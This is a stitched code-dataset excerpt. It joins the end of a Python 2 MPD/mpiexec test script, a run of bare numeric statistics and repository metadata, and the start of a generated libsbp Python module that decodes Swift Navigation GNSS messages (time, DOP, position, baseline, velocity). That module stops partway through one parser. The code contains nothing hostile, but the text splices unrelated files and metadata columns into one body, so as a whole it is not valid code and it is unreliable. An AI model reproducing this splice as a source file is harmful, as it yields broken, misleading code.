PYEXT = '.py'
NMPDS = 1
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = 'hello\nhello\nbye\nbye\n'
rv = mpdtest.run(cmd="mpiexec%s -gn 2 /bin/echo hello : /bin/echo bye" % (PYEXT),
                 expOut=expout,chkOut=1)
rv = mpdtest.run(cmd="mpiexec%s -gn 2 : /bin/echo hello : /bin/echo bye" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -gexec sets a global default executable for blocks with none.
print "TEST -gexec"
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
expout = '%s\n%s\n' % (socket.gethostname(),clusterHosts[0])
rv = mpdtest.run(cmd="mpiexec%s -gexec hostname : -n 1 : -n 1" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
# test: -genvlist is the global form of -envlist, applied to every block.
print "TEST -genvlist"
PYEXT = '.py'
NMPDS = 2
HFILE = 'temph'
import os,socket
from mpdlib import MPDTest
mpdtest = MPDTest()
os.environ['MPD_CON_EXT'] = 'testing'
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
temph = open(HFILE,'w')
for host in clusterHosts: print >>temph, host
temph.close()
os.system("mpdboot%s -f %s -n %d" % (PYEXT,HFILE,NMPDS) )
os.environ['FOO'] = 'BAR'
os.environ['RMB'] = 'ZZZ'
expout = 'BAR ZZZ\n'
rv = mpdtest.run(cmd="mpiexec%s -genvlist FOO,RMB : sh -c '/bin/echo $FOO $RMB'" % (PYEXT),
                 expOut=expout,chkOut=1)
os.system("mpdallexit%s 1> /dev/null 2> /dev/null" % (PYEXT) )
| 32.816742
| 104
| 0.653568
| 2,373
| 14,505
| 3.976401
| 0.079646
| 0.062315
| 0.080119
| 0.08457
| 0.858944
| 0.856401
| 0.846545
| 0.83563
| 0.821323
| 0.810301
| 0
| 0.020039
| 0.160565
| 14,505
| 441
| 105
| 32.891156
| 0.754928
| 0.075147
| 0
| 0.76781
| 0
| 0.007916
| 0.359952
| 0.012936
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.113456
| null | null | 0.110818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c7840482a2f07a89cf16d278196da0a465a115b4
| 80,174
|
py
|
Python
|
python/sbp/jit/navigation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/jit/navigation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/jit/navigation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (C) 2015-2018 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
Geodetic navigation messages reporting GPS time, position, velocity,
and baseline position solutions. For position solutions, these
messages define several different position solutions: single-point
(SPP), RTK, and pseudo-absolute position solutions.
The SPP is the standalone, absolute GPS position solution using only
a single receiver. The RTK solution is the differential GPS
solution, which can use either a fixed/integer or floating carrier
phase ambiguity. The pseudo-absolute position solution uses a
user-provided, well-surveyed base station position (if available)
and the RTK solution in tandem.
When the inertial navigation mode indicates that the IMU is used,
all messages are reported in the vehicle body frame as defined by
device settings. By default, the vehicle body frame is configured to be
coincident with the antenna phase center. When there is no inertial
navigation, the solution will be reported at the phase center of the antenna.
There is no inertial navigation capability on Piksi Multi or Duro.
The tow field, when valid, is most often the Time of Measurement. When this
is the case, the 5th bit of flags is set to the default value of 0.
When this is not the case, the tow may be a time of arrival or a local
system timestamp, irrespective of the time reference (GPS Week or else),
but not a Time of Measurement.
"""
import json
import numpy as np
from sbp.jit.msg import SBP, SENDER_ID
from sbp.jit.msg import get_u8, get_u16, get_u32, get_u64
from sbp.jit.msg import get_s8, get_s16, get_s32, get_s64
from sbp.jit.msg import get_f32, get_f64, judicious_round
from sbp.jit.msg import get_string, get_fixed_string, get_setting
from sbp.jit.msg import get_array, get_fixed_array
# Automatically generated from piksi/yaml/swiftnav/sbp/navigation.yaml with generate.py.
# Please do not hand edit!
SBP_MSG_GPS_TIME = 0x0102
class MsgGPSTime(SBP):
  """SBP class for message MSG_GPS_TIME (0x0102).

  You can have MSG_GPS_TIME inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  Reports GPS time — the weeks and seconds elapsed since the GPS
  epoch (midnight January 6, 1980 UTC).  The time of week lies in
  [0, 604800) seconds; GPS time does not accumulate leap seconds
  and so carries a small offset from UTC.  In a message stream this
  message precedes a set of other navigation messages referenced to
  the same time (but lacking the ns field) and indicates a more
  precise time for them.
  """
  __slots__ = ['wn',
               'tow',
               'ns_residual',
               'flags',
               ]

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the wire fields in order; return (field dict, offset, length)."""
    decoded = {}
    # (slot name, wire decoder) pairs in wire order.
    for name, decode in (('wn', get_u16),
                         ('tow', get_u32),
                         ('ns_residual', get_s32),
                         ('flags', get_u8)):
      value, offset, length = decode(buf, offset, length)
      decoded[name] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse members and assign them to self's slots.

    Returns an empty dict (and the untouched offset/length) when
    parsing consumed no bytes.
    """
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      return {}, offset, length
    for name in ('wn', 'tow', 'ns_residual', 'flags'):
      setattr(self, name, res[name])
    return res, off, length
SBP_MSG_GPS_TIME_GNSS = 0x0104
class MsgGPSTimeGnss(SBP):
  """SBP class for message MSG_GPS_TIME_GNSS (0x0104).

  You can have MSG_GPS_TIME_GNSS inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  Reports GPS time — the weeks and seconds elapsed since the GPS
  epoch (midnight January 6, 1980 UTC).  The time of week lies in
  [0, 604800) seconds; GPS time does not accumulate leap seconds
  and so carries a small offset from UTC.  In a message stream this
  message precedes a set of other navigation messages referenced to
  the same time (but lacking the ns field) and indicates a more
  precise time for them.
  """
  __slots__ = ['wn',
               'tow',
               'ns_residual',
               'flags',
               ]

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the wire fields in order; return (field dict, offset, length)."""
    decoded = {}
    # (slot name, wire decoder) pairs in wire order.
    for name, decode in (('wn', get_u16),
                         ('tow', get_u32),
                         ('ns_residual', get_s32),
                         ('flags', get_u8)):
      value, offset, length = decode(buf, offset, length)
      decoded[name] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse members and assign them to self's slots.

    Returns an empty dict (and the untouched offset/length) when
    parsing consumed no bytes.
    """
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      return {}, offset, length
    for name in ('wn', 'tow', 'ns_residual', 'flags'):
      setattr(self, name, res[name])
    return res, off, length
SBP_MSG_UTC_TIME = 0x0103
class MsgUtcTime(SBP):
  """SBP class for message MSG_UTC_TIME (0x0103).

  You can have MSG_UTC_TIME inherit its fields directly
  from an inherited SBP object, or construct it inline using a dict
  of its fields.

  Reports Universal Coordinated Time (UTC).  The flags indicate the
  source of the UTC offset value and the source of the time fix.
  """
  __slots__ = ['flags',
               'tow',
               'year',
               'month',
               'day',
               'hours',
               'minutes',
               'seconds',
               'ns',
               ]

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the wire fields in order; return (field dict, offset, length)."""
    decoded = {}
    # (slot name, wire decoder) pairs in wire order.
    for name, decode in (('flags', get_u8),
                         ('tow', get_u32),
                         ('year', get_u16),
                         ('month', get_u8),
                         ('day', get_u8),
                         ('hours', get_u8),
                         ('minutes', get_u8),
                         ('seconds', get_u8),
                         ('ns', get_u32)):
      value, offset, length = decode(buf, offset, length)
      decoded[name] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse members and assign them to self's slots.

    Returns an empty dict (and the untouched offset/length) when
    parsing consumed no bytes.
    """
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      return {}, offset, length
    for name in ('flags', 'tow', 'year', 'month', 'day',
                 'hours', 'minutes', 'seconds', 'ns'):
      setattr(self, name, res[name])
    return res, off, length
SBP_MSG_UTC_TIME_GNSS = 0x0105
class MsgUtcTimeGnss(SBP):
  """SBP class for message MSG_UTC_TIME_GNSS (0x0105).

  Reports Universal Coordinated Time (UTC).  The flags field encodes the
  source of the UTC offset value and the source of the time fix.

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['flags', 'tow', 'year', 'month', 'day',
               'hours', 'minutes', 'seconds', 'ns']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('flags', get_u8),
                        ('tow', get_u32),
                        ('year', get_u16),
                        ('month', get_u8),
                        ('day', get_u8),
                        ('hours', get_u8),
                        ('minutes', get_u8),
                        ('seconds', get_u8),
                        ('ns', get_u32)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_DOPS = 0x0208
class MsgDops(SBP):
  """SBP class for message MSG_DOPS (0x0208).

  Dilution of precision (DOP) report: the effect of navigation satellite
  geometry on positional measurement precision.  The flags field indicates
  whether the reported DOP corresponds to a differential or SPP solution.

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'gdop', 'pdop', 'tdop', 'hdop', 'vdop', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('gdop', get_u16),
                        ('pdop', get_u16),
                        ('tdop', get_u16),
                        ('hdop', get_u16),
                        ('vdop', get_u16),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_ECEF = 0x0209
class MsgPosECEF(SBP):
  """SBP class for message MSG_POS_ECEF (0x0209).

  Absolute Earth Centered Earth Fixed (ECEF) position solution and its
  status (single point vs pseudo-absolute RTK).  With a surveyed base
  station position and an RTK solution, this is a pseudo-absolute position
  (base position plus the rover's RTK baseline vector).  The full GPS time
  is given by the preceding MSG_GPS_TIME with the matching time-of-week
  (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_f64),
                        ('y', get_f64),
                        ('z', get_f64),
                        ('accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_ECEF_COV = 0x0214
class MsgPosECEFCov(SBP):
  """SBP class for message MSG_POS_ECEF_COV (0x0214).

  Absolute Earth Centered Earth Fixed (ECEF) position solution with its
  status (single point vs pseudo-absolute RTK) and the upper-triangular
  portion of the 3x3 covariance matrix.  With a surveyed base station
  position and an RTK solution, this is a pseudo-absolute position (base
  position plus the rover's RTK baseline vector).  The full GPS time is
  given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z',
               'cov_x_x', 'cov_x_y', 'cov_x_z',
               'cov_y_y', 'cov_y_z', 'cov_z_z',
               'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_f64),
                        ('y', get_f64),
                        ('z', get_f64),
                        ('cov_x_x', get_f32),
                        ('cov_x_y', get_f32),
                        ('cov_x_z', get_f32),
                        ('cov_y_y', get_f32),
                        ('cov_y_z', get_f32),
                        ('cov_z_z', get_f32),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      if read is get_f32 and SBP.judicious_rounding:
        # Optional rounding applied only to single-precision fields.
        value = judicious_round(np.float32(value))
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_LLH = 0x020A
class MsgPosLLH(SBP):
  """SBP class for message MSG_POS_LLH (0x020A).

  Absolute geodetic position solution and its status (single point vs
  pseudo-absolute RTK).  With a surveyed base station position and an RTK
  solution, this is a pseudo-absolute position (base position plus the
  rover's RTK baseline vector).  The full GPS time is given by the
  preceding MSG_GPS_TIME with the matching time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'lat', 'lon', 'height',
               'h_accuracy', 'v_accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('lat', get_f64),
                        ('lon', get_f64),
                        ('height', get_f64),
                        ('h_accuracy', get_u16),
                        ('v_accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_LLH_COV = 0x0211
class MsgPosLLHCov(SBP):
  """SBP class for message MSG_POS_LLH_COV (0x0211).

  Absolute geodetic position solution with its status (single point vs
  pseudo-absolute RTK) and the upper triangle of the 3x3 covariance
  matrix.  Position information and Fix Mode flags follow the MSG_POS_LLH
  convention.  The covariance matrix is computed in the local-level North,
  East, Down frame, so covariances are reported against the "downward"
  measurement and care should be taken with the sign convention.

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'lat', 'lon', 'height',
               'cov_n_n', 'cov_n_e', 'cov_n_d',
               'cov_e_e', 'cov_e_d', 'cov_d_d',
               'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('lat', get_f64),
                        ('lon', get_f64),
                        ('height', get_f64),
                        ('cov_n_n', get_f32),
                        ('cov_n_e', get_f32),
                        ('cov_n_d', get_f32),
                        ('cov_e_e', get_f32),
                        ('cov_e_d', get_f32),
                        ('cov_d_d', get_f32),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      if read is get_f32 and SBP.judicious_rounding:
        # Optional rounding applied only to single-precision fields.
        value = judicious_round(np.float32(value))
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_BASELINE_ECEF = 0x020B
class MsgBaselineECEF(SBP):
  """SBP class for message MSG_BASELINE_ECEF (0x020B).

  Baseline solution in Earth Centered Earth Fixed (ECEF) coordinates: the
  relative vector distance from the base station to the rover receiver.
  The full GPS time is given by the preceding MSG_GPS_TIME with the
  matching time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_s32),
                        ('y', get_s32),
                        ('z', get_s32),
                        ('accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_BASELINE_NED = 0x020C
class MsgBaselineNED(SBP):
  """SBP class for message MSG_BASELINE_NED (0x020C).

  Baseline solution in North East Down (NED) coordinates: the relative
  vector distance from the base station to the rover receiver, in the NED
  frame defined at the local WGS84 tangent plane centered at the base
  station position.  The full GPS time is given by the preceding
  MSG_GPS_TIME with the matching time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'n', 'e', 'd',
               'h_accuracy', 'v_accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('n', get_s32),
                        ('e', get_s32),
                        ('d', get_s32),
                        ('h_accuracy', get_u16),
                        ('v_accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_VEL_ECEF = 0x020D
class MsgVelECEF(SBP):
  """SBP class for message MSG_VEL_ECEF (0x020D).

  Velocity in Earth Centered Earth Fixed (ECEF) coordinates.  The full GPS
  time is given by the preceding MSG_GPS_TIME with the matching
  time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_s32),
                        ('y', get_s32),
                        ('z', get_s32),
                        ('accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_VEL_ECEF_COV = 0x0215
class MsgVelECEFCov(SBP):
  """SBP class for message MSG_VEL_ECEF_COV (0x0215).

  Velocity in Earth Centered Earth Fixed (ECEF) coordinates, with the
  upper-triangular portion of the 3x3 covariance matrix.  The full GPS
  time is given by the preceding MSG_GPS_TIME with the matching
  time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z',
               'cov_x_x', 'cov_x_y', 'cov_x_z',
               'cov_y_y', 'cov_y_z', 'cov_z_z',
               'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_s32),
                        ('y', get_s32),
                        ('z', get_s32),
                        ('cov_x_x', get_f32),
                        ('cov_x_y', get_f32),
                        ('cov_x_z', get_f32),
                        ('cov_y_y', get_f32),
                        ('cov_y_z', get_f32),
                        ('cov_z_z', get_f32),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      if read is get_f32 and SBP.judicious_rounding:
        # Optional rounding applied only to single-precision fields.
        value = judicious_round(np.float32(value))
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_VEL_NED = 0x020E
class MsgVelNED(SBP):
  """SBP class for message MSG_VEL_NED (0x020E).

  Velocity in local North East Down (NED) coordinates, where the NED frame
  is the local WGS84 tangent plane centered at the current position.  The
  full GPS time is given by the preceding MSG_GPS_TIME with the matching
  time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'n', 'e', 'd',
               'h_accuracy', 'v_accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('n', get_s32),
                        ('e', get_s32),
                        ('d', get_s32),
                        ('h_accuracy', get_u16),
                        ('v_accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_VEL_NED_COV = 0x0212
class MsgVelNEDCov(SBP):
  """SBP class for message MSG_VEL_NED_COV (0x0212).

  Velocity in local North East Down (NED) coordinates, where the NED frame
  is the local WGS84 tangent plane centered at the current position.  The
  full GPS time is given by the preceding MSG_GPS_TIME with the matching
  time-of-week (tow).  Similar to MSG_VEL_NED but includes the
  upper-triangular portion of the 3x3 covariance matrix.

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'n', 'e', 'd',
               'cov_n_n', 'cov_n_e', 'cov_n_d',
               'cov_e_e', 'cov_e_d', 'cov_d_d',
               'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('n', get_s32),
                        ('e', get_s32),
                        ('d', get_s32),
                        ('cov_n_n', get_f32),
                        ('cov_n_e', get_f32),
                        ('cov_n_d', get_f32),
                        ('cov_e_e', get_f32),
                        ('cov_e_d', get_f32),
                        ('cov_d_d', get_f32),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      if read is get_f32 and SBP.judicious_rounding:
        # Optional rounding applied only to single-precision fields.
        value = judicious_round(np.float32(value))
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_ECEF_GNSS = 0x0229
class MsgPosECEFGnss(SBP):
  """SBP class for message MSG_POS_ECEF_GNSS (0x0229).

  Absolute Earth Centered Earth Fixed (ECEF) position solution and its
  status (single point vs pseudo-absolute RTK).  With a surveyed base
  station position and an RTK solution, this is a pseudo-absolute position
  (base position plus the rover's RTK baseline vector).  The full GPS time
  is given by the preceding MSG_GPS_TIME with the matching time-of-week
  (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_f64),
                        ('y', get_f64),
                        ('z', get_f64),
                        ('accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_ECEF_COV_GNSS = 0x0234
class MsgPosECEFCovGnss(SBP):
  """SBP class for message MSG_POS_ECEF_COV_GNSS (0x0234).

  Absolute Earth Centered Earth Fixed (ECEF) position solution with its
  status (single point vs pseudo-absolute RTK) and the upper-triangular
  portion of the 3x3 covariance matrix.  With a surveyed base station
  position and an RTK solution, this is a pseudo-absolute position (base
  position plus the rover's RTK baseline vector).  The full GPS time is
  given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'x', 'y', 'z',
               'cov_x_x', 'cov_x_y', 'cov_x_z',
               'cov_y_y', 'cov_y_z', 'cov_z_z',
               'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('x', get_f64),
                        ('y', get_f64),
                        ('z', get_f64),
                        ('cov_x_x', get_f32),
                        ('cov_x_y', get_f32),
                        ('cov_x_z', get_f32),
                        ('cov_y_y', get_f32),
                        ('cov_y_z', get_f32),
                        ('cov_z_z', get_f32),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      if read is get_f32 and SBP.judicious_rounding:
        # Optional rounding applied only to single-precision fields.
        value = judicious_round(np.float32(value))
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_LLH_GNSS = 0x022A
class MsgPosLLHGnss(SBP):
  """SBP class for message MSG_POS_LLH_GNSS (0x022A).

  Absolute geodetic position solution and its status (single point vs
  pseudo-absolute RTK).  With a surveyed base station position and an RTK
  solution, this is a pseudo-absolute position (base position plus the
  rover's RTK baseline vector).  The full GPS time is given by the
  preceding MSG_GPS_TIME with the matching time-of-week (tow).

  Fields may be inherited from another SBP object or supplied inline as a
  dict of field values.
  """
  __slots__ = ['tow', 'lat', 'lon', 'height',
               'h_accuracy', 'v_accuracy', 'n_sats', 'flags']

  @classmethod
  def parse_members(cls, buf, offset, length):
    """Decode the member fields from buf; returns (field dict, offset, length)."""
    decoded = {}
